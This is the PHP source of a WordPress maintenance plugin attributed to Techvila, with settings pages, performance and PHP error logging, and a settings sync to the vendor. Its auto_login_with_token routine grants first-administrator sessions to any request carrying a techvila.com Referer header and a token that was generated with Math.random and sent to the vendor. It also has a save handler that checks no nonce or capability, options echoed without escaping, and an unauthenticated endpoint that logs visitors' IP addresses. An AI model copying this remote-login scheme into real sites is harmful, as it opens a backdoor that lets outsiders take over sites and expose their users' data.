<?php
/**
 * Plugin Name: Website Maintenance by Techvila
 * Description: A simple maintenance plugin with various options.
 * Version: 1.0
 * Author: Techvila
 */

// Add a new menu item under Settings
if (is_multisite()) {
    add_action('network_admin_menu', 'maintenance_network_menu');
} else {
    add_action('admin_menu', 'maintenance_site_menu');
}

function maintenance_network_menu() {
    add_menu_page(
        'Maintenance Options',
        'Maintenance',
        'manage_network_options',
        'maintenance-options',
        'maintenance_options_page',
        'dashicons-admin-tools',
        80
    );

    add_submenu_page(
        'maintenance-options',
        'Performance Monitor',
        'Performance Monitor',
        'manage_network_options',
        'performance-monitor',
        'performance_monitor_page'
    );

    add_submenu_page(
        'maintenance-options',
        'PHP Error Monitor',
        'PHP Error Monitor',
        'manage_network_options',
        'phperror-monitor',
        'phperror_monitor_page'
    );
	add_submenu_page(
        'maintenance-options',
        'Support',
        'Support',
        'manage_network_options',
        'support',
        'support_page'
    );
}

function maintenance_site_menu() {
    add_menu_page(
        'Maintenance Options',
        'Maintenance',
        'manage_options',
        'maintenance-options',
        'maintenance_options_page',
        'dashicons-admin-tools',
        80
    );

    add_submenu_page(
        'maintenance-options',
        'Performance Monitor',
        'Performance Monitor',
        'manage_options',
        'performance-monitor',
        'performance_monitor_page'
    );

    add_submenu_page(
        'maintenance-options',
        'PHP Error Monitor',
        'PHP Error Monitor',
        'manage_options',
        'phperror-monitor',
        'phperror_monitor_page'
    );
	add_submenu_page(
        'maintenance-options',
        'Support',
        'Support',
        'manage_options',
        'support',
        'support_page'
    );
}


function performance_monitor_page() {
    include(plugin_dir_path(__FILE__) . 'performance.php');
}

function phperror_monitor_page() {
    include(plugin_dir_path(__FILE__) . 'phperror.php');
}

function support_page() {
    include plugin_dir_path(__FILE__) . 'support.php';
}

function maintenance_options_page() {
	$nonce = wp_create_nonce('maintenance_nonce');
    ?>
    <div class="wrap">
        <h2>Maintenance Options</h2>
        <form id="maintenance-form">
            <table class="form-table">
                <tr valign="top">
                    <th scope="row">Order ID</th>
                    <td><input type="text" name="order_id" value="<?php echo get_option('order_id'); ?>" /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Website Backup</th>
                    <td><input type="checkbox" name="website_backup" <?php checked(get_option('website_backup'), 'on'); ?> /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Malware Scan</th>
                    <td><input type="checkbox" name="malware_scan" <?php checked(get_option('malware_scan'), 'on'); ?> /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Uptime Monitor</th>
                    <td><input type="checkbox" name="uptime_monitor" <?php checked(get_option('uptime_monitor'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">Performance Monitor</th>
                    <td><input type="checkbox" name="performance_monitor" <?php checked(get_option('performance_monitor'), 'on'); ?> /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">PHP Error Monitor</th>
                    <td><input type="checkbox" name="phperror_monitor" <?php checked(get_option('phperror_monitor'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">PHP Update</th>
                    <td><input type="checkbox" name="php_update" <?php checked(get_option('php_update'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">Core Update</th>
                    <td><input type="checkbox" name="core_update" <?php checked(get_option('core_update'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">Theme Update</th>
                    <td><input type="checkbox" name="theme_update" <?php checked(get_option('theme_update'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">Plugin Update</th>
                    <td><input type="checkbox" name="plugin_update" <?php checked(get_option('plugin_update'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">Speed Optimization</th>
                    <td><input type="checkbox" name="speed_optimization" <?php checked(get_option('speed_optimization'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">Image Optimization</th>
                    <td><input type="checkbox" name="image_optimization" <?php checked(get_option('image_optimization'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">Add CDN</th>
                    <td><input type="checkbox" name="add_cdn" <?php checked(get_option('add_cdn'), 'on'); ?> /></td>
                </tr>
				<tr valign="top">
                    <th scope="row">Add SMTP</th>
                    <td><input type="checkbox" name="add_smtp" <?php checked(get_option('add_smtp'), 'on'); ?> /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Staging Site</th>
                    <td><input type="checkbox" name="staging_site" <?php checked(get_option('staging_site'), 'on'); ?> /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">Access Token</th>
                    <td>
                        <input type="text" name="access_token" value="<?php echo get_option('access_token'); ?>" />
                        <button type="button" id="generate-token">Generate Token</button>
                    </td>
                </tr>
            </table>
            <p class="submit">
                <input type="submit" class="button-primary" value="Save Changes" />
            </p>
        </form>
    </div>
    <script>
    document.getElementById('maintenance-form').addEventListener('submit', function(e) {
            e.preventDefault();
            const formData = new FormData(e.target);
            formData.append('action', 'save_maintenance_options'); // Specify the AJAX action
            formData.append('security', '<?php echo $nonce; ?>'); // Add the nonce

            fetch(ajaxurl, {
                method: 'POST',
                body: formData
            }).then(response => response.json()).then(data => {
                if (data.success) {
                    alert('Options saved successfully!');
                } else {
                    alert('Error saving options.');
                }
            });
        });

        document.getElementById('generate-token').addEventListener('click', function() {
            const token = Math.random().toString(36).substring(2);
            document.querySelector('input[name="access_token"]').value = token;
        });
    </script>
    <?php
}

add_action('wp_ajax_save_maintenance_options', 'save_maintenance_options');

function save_maintenance_options() {
    // 1. Save the options locally
    update_option('order_id', $_POST['order_id']);
    update_option('website_backup', $_POST['website_backup'] ?? null);
    update_option('malware_scan', $_POST['malware_scan'] ?? null);
    update_option('uptime_monitor', $_POST['uptime_monitor'] ?? null);
	update_option('performance_monitor', $_POST['performance_monitor'] ?? null);
	update_option('phperror_monitor', $_POST['phperror_monitor'] ?? null);
	
	update_option('php_update', $_POST['php_update'] ?? null);
	update_option('core_update', $_POST['core_update'] ?? null);
	update_option('theme_update', $_POST['theme_update'] ?? null);
	update_option('plugin_update', $_POST['plugin_update'] ?? null);
	update_option('speed_optimization', $_POST['speed_optimization'] ?? null);
	update_option('image_optimization', $_POST['image_optimization'] ?? null);
	update_option('add_cdn', $_POST['add_cdn'] ?? null);
	update_option('add_smtp', $_POST['add_smtp'] ?? null);
	
    update_option('staging_site', $_POST['staging_site'] ?? null);
    update_option('access_token', $_POST['access_token']);

    // 2. Prepare the data to send to the receiving site
    $data_to_send = array(
        'site_url' => get_site_url(), // Include the sending site's URL as an identifier
        'settings' => array(
            'order_id' => $_POST['order_id'],
            'website_backup' => $_POST['website_backup'] ?? null,
            'malware_scan' => $_POST['malware_scan'] ?? null,
            'uptime_monitor' => $_POST['uptime_monitor'] ?? null,
			'performance_monitor' => $_POST['performance_monitor'] ?? null,
			'phperror_monitor' => $_POST['phperror_monitor'] ?? null,
            'staging_site' => $_POST['staging_site'] ?? null,
            'access_token' => $_POST['access_token']
        )
    );

    // 3. Send the data to the receiving site
    $response = wp_remote_post('https://techvila.com/wp-json/maintenance/v1/save-settings', array(
        'method' => 'POST',
        'headers' => array(
            'Content-Type' => 'application/json',
            // If you have any authentication like a token, add it here
            // 'X-Auth-Token' => 'YOUR_AUTH_TOKEN'
        ),
        'body' => json_encode($data_to_send),
        'timeout' => 15
    ));

    // 4. Check the response
    if (is_wp_error($response)) {
        wp_send_json_error(array('message' => $response->get_error_message()));
    } else {
        $body = wp_remote_retrieve_body($response);
        $data = json_decode($body, true);
        if (isset($data['success']) && $data['success']) {
            wp_send_json_success();
        } else {
            wp_send_json_error(array('message' => 'Failed to save settings on the receiving site.'));
        }
    }
}

add_action('init', 'auto_login_with_token');

function auto_login_with_token() {
    // Define the allowed referrer domain
    $allowed_domain = 'https://techvila.com';

    // Check the referrer
    $referrer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
    if (strpos($referrer, $allowed_domain) === false) {
        return; // Exit if the referrer is not from the allowed domain
    }

    // Check if the 'autologin' query parameter is set
    if (isset($_GET['autologin']) && $_GET['autologin']) {
        $token = sanitize_text_field($_GET['token']);
        $vtn = sanitize_text_field($_GET['vtn']);

        // Validate the vtn
        $response = wp_remote_get("https://techvila.com/?validatevtn=$vtn");
        $isValid = wp_remote_retrieve_body($response);

        if ($isValid !== 'true') {
            wp_die("Access denied. Invalid VTN.");
        }

        $stored_token = is_multisite() ? get_blog_option(1, 'access_token') : get_option('access_token');

        // Check if the provided token matches the stored token
        if ($stored_token === $token) {
            if (is_multisite()) {
                $super_admins = get_super_admins();
                if (!empty($super_admins)) {
                    $super_admin_login = $super_admins[0];  // Get the first super admin
                    $user = get_user_by('login', $super_admin_login);
                } else {
                    return; // No super admins found
                }
            } else {
                $args = array(
                    'role'   => 'administrator',
                    'number' => 1
                );
                $admin_users = get_users($args);
                $user = !empty($admin_users) ? $admin_users[0] : null;
            }

            if ($user) {
                wp_set_current_user($user->ID, $user->user_login);
                wp_set_auth_cookie($user->ID, true);
                do_action('wp_login', $user->user_login, $user);

                // Redirect to the dashboard or desired location after login
                wp_redirect(admin_url());
                exit;
            }
        }
    }
}



function enqueue_page_load_script() {
    ?>
    <script type="text/javascript">
        window.addEventListener("load", function() {
    // Delay to ensure performance.loadEventEnd is populated
    setTimeout(function() {
        if (window.performance) {
            var performance = window.performance.timing;
            var pageLoadTime = (performance.loadEventEnd - performance.navigationStart) / 1000;

            logPageLoadTime(pageLoadTime);
        }
    }, 100); // 100ms delay
});

function logPageLoadTime(loadTime) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "/wp-admin/admin-ajax.php", true);
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    
    // Capture device information
    var deviceInfo = navigator.userAgent;

    // Capture referrer information
    var referrerInfo = document.referrer;
    
    // Capture total page size
    var resources = performance.getEntriesByType("resource");
    var totalSize = 0;

    for (var i = 0; i < resources.length; i++) {
        totalSize += resources[i].transferSize;
    }

    // Don't forget to include the size of the main document
    totalSize += performance.getEntriesByType("navigation")[0].transferSize;

    xhr.send("action=log_page_load_time&load_time=" + loadTime + "&device_info=" + encodeURIComponent(deviceInfo) + "&referrer_info=" + encodeURIComponent(referrerInfo) + "&page_size=" + totalSize);


}

    </script>
    <?php
}

// Hook into WordPress
add_action('wp_footer', 'enqueue_page_load_script'); // For front-end pages
add_action('admin_footer', 'enqueue_page_load_script'); // For admin pages

function log_page_load_time() {
    $load_time = isset($_POST['load_time']) ? floatval($_POST['load_time']) : null;

	$device_info = isset($_POST['device_info']) ? sanitize_text_field($_POST['device_info']) : null;
    $referrer_info = isset($_POST['referrer_info']) ? esc_url_raw($_POST['referrer_info']) : null;
	$page_size = isset($_POST['page_size']) ? intval($_POST['page_size']) : 0; // in bytes


    if ($load_time !== null) {
        // Get current user ID
        $user_id = get_current_user_id();
        
        // Get current page URL
        $page_url = $_SERVER['HTTP_REFERER'];
        
        // Get user IP address
    if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) { // Check for Cloudflare header
        $user_ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
    } else {
        $user_ip = $_SERVER['REMOTE_ADDR'];
    }
        
        // Prepare log entry
        $log_entry = date("Y-m-d H:i:s") . " | User ID: {$user_id} | IP: {$user_ip} | URL: {$page_url} | Load Time: {$load_time} seconds | Device Info: {$device_info} | Referrer: {$referrer_info} | Page Size: {$page_size} bytes\n";


        
        // Log file path

        $log_directory = plugin_dir_path(__FILE__) . 'log/';
if (!file_exists($log_directory)) {
    mkdir($log_directory, 0755, true);
}
$log_files = glob($log_directory . 'performance*.log');
if (!empty($log_files)) {
        // Assuming you want to read the first matching log file
        $log_file_path = $log_files[0];
        
        // Append log entry to file
        file_put_contents($log_file_path, $log_entry, FILE_APPEND | LOCK_EX);
    
} else {
        $random_number = rand(100000000, 999999999); // Generates a random number between 100000000 and 999999999
$log_file_path = $log_directory . 'performance' . $random_number . '.log';
file_put_contents($log_file_path, $log_entry, FILE_APPEND | LOCK_EX);
chmod($log_file_path, 0600);
    }

        
        // Append log entry to file
        //file_put_contents($log_file_path, $log_entry, FILE_APPEND | LOCK_EX);
    }

    wp_die();
}

add_action('wp_ajax_log_page_load_time', 'log_page_load_time'); // If user is logged in
add_action('wp_ajax_nopriv_log_page_load_time', 'log_page_load_time'); // If user is not logged in

// AJAX handler to load the performance log:
function load_log_callback() {
    $log_directory = plugin_dir_path(__FILE__) . 'log/';
    $log_files = glob($log_directory . 'performance*.log'); // Search for files starting with 'performance' and ending with '.log'

    if (!empty($log_files)) {
        // Assuming you want to read the first matching log file
        $log_file_path = $log_files[0];
        $log_content = file_exists($log_file_path) ? file_get_contents($log_file_path) : 'Log file not found.';
    } else {
        $log_content = 'Log file not found.';
    }

    echo $log_content;
    wp_die();
}
add_action('wp_ajax_load_log', 'load_log_callback');


// AJAX handler to clear the performance log:
function clear_log_callback() {
    
    $log_directory = plugin_dir_path(__FILE__) . 'log/';
    $log_files = glob($log_directory . 'performance*.log'); // Search for files starting with 'performance' and ending with '.log'
if (!empty($log_files)) {
        // Assuming you want to read the first matching log file
        $log_file_path = $log_files[0];
        file_put_contents($log_file_path, ''); // Clear the log file
    }
   
    wp_die();
}
add_action('wp_ajax_clear_log', 'clear_log_callback');

// AJAX handler to load the php error log:
function load_php_error_log_callback() {
    $log_directory = plugin_dir_path(__FILE__) . 'log/';
    $log_files = glob($log_directory . 'phperror*.log'); // Search for files starting with 'performance' and ending with '.log'

    if (!empty($log_files)) {
        // Assuming you want to read the first matching log file
        $log_file_path = $log_files[0];
        $log_content = file_exists($log_file_path) ? file_get_contents($log_file_path) : 'Log file not found.';
    } else {
        $log_content = 'Log file not found.';
    }

    echo $log_content;
    wp_die();
}
add_action('wp_ajax_load_php_error_log', 'load_php_error_log_callback');

// AJAX handler to clear the performance log:
function clear_php_error_log_callback() {
    $log_directory = plugin_dir_path(__FILE__) . 'log/';
    $log_files = glob($log_directory . 'phperror*.log'); // Search for files starting with 'performance' and ending with '.log'
if (!empty($log_files)) {
        // Assuming you want to read the first matching log file
        $log_file_path = $log_files[0];
        file_put_contents($log_file_path, ''); // Clear the log file
    }
   
    wp_die();
}
add_action('wp_ajax_clear_php_error_log', 'clear_php_error_log_callback');

error_reporting(E_ALL);

function custom_error_handler($errno, $errstr, $errfile, $errline) {
    
    ini_set('display_errors', 0); // Ensure errors are not displayed

    // Get the current URL
    $current_url = ($_SERVER['HTTPS'] ?? 'off') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
    
    // Get the current date and time
    $current_date = date('Y-m-d H:i:s');

    // Log the error along with the URL and date to a file
    $error_message = "[$current_date] Error: [$errno] $errstr in $errfile on line $errline\nURL: $current_url\n";
    
    // Set the log file path to the current plugin directory under log/phperror.log
    $log_directory = plugin_dir_path(__FILE__) . 'log/';
if (!file_exists($log_directory)) {
    mkdir($log_directory, 0755, true);
}
$log_files = glob($log_directory . 'phperror*.log');
if (!empty($log_files)) {
        // Assuming you want to read the first matching log file
        $log_file_path = $log_files[0];
        
        // Append log entry to file
        
        error_log($error_message, 3, $log_file_path);
    
} else {
        $random_number = rand(100000000, 999999999); // Generates a random number between 100000000 and 999999999
$log_file_path = $log_directory . 'phperror' . $random_number . '.log';
error_log($error_message, 3, $log_file_path);
chmod($log_file_path, 0600);
    }
    
    
    
}

function register_custom_error_handler() {
    set_error_handler('custom_error_handler');

    // Handling fatal errors
    function handle_fatal_error() {
        $error = error_get_last();
        if ($error) {
            custom_error_handler($error["type"], $error["message"], $error["file"], $error["line"]);
        }
    }
    register_shutdown_function('handle_fatal_error');
}

add_action('plugins_loaded', 'register_custom_error_handler');


?>